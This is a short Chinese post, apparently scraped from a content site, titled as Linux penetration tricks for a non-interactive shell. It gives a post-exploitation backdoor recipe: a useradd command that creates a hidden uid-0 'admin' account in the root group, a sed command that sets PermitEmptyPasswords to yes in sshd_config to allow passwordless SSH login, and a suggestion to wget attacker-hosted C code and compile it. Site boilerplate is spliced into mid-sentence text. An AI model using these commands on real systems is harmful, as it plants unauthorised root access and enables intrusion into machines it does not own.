首先添加管理员账号
执行命令
useradd -u 0 -o -g root -G root -d /home/admin admin
说明:
-u 0 指将uid指定为0(零)与root相同,登录后的提示符为#而非$.
-o 指因为重复了uid(与root帐号的uid重复)必须指定这个参数.
-g root 初始化组的组名,当用户属于多个组时,(在-G参数中指定),登录时所在组,
Linux非交互式shell下渗透技巧
。缺省该项时,系统新建一个与用户名同名的组,并且初始化时设为该组名.而不论-G指定为哪些组.-G root 指定用户名所属的组列表,一个用户可以属于多个组,组名间用逗号分隔,组名必须已经存在.
-d /home/admin指定用户的属主目录
admin 新建的用户名为admin.
这样就添加了一个 有root权限的账户admin
由于在非交互式shell下无法设置密码 然后SSH空密码也无法登陆 比较纠结了
这时候就要修改配置文件 /etc/ssh/sshd_config
把里面 PermitEmptyPasswords no 改为 PermitEmptyPasswords yes 即允许空密码登陆,
电脑资料
《Linux非交互式shell下渗透技巧》(https://www.unjs.com)。在非交互式shell下 该怎么修改这个配置文件里的某一行数据呢?
用sed命令可以实现
如下
sed -i 's/PermitEmptyPasswords no/PermitEmptyPasswords yes/g' file
当然也可以用c写代码来实现然后放到自己web服务器上wget过去 编译执行。
然后就可以SSH登陆了。